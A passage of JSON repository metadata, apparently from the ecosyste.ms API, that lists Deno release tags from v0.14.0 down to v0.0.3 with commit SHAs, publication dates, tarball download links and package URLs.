62de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/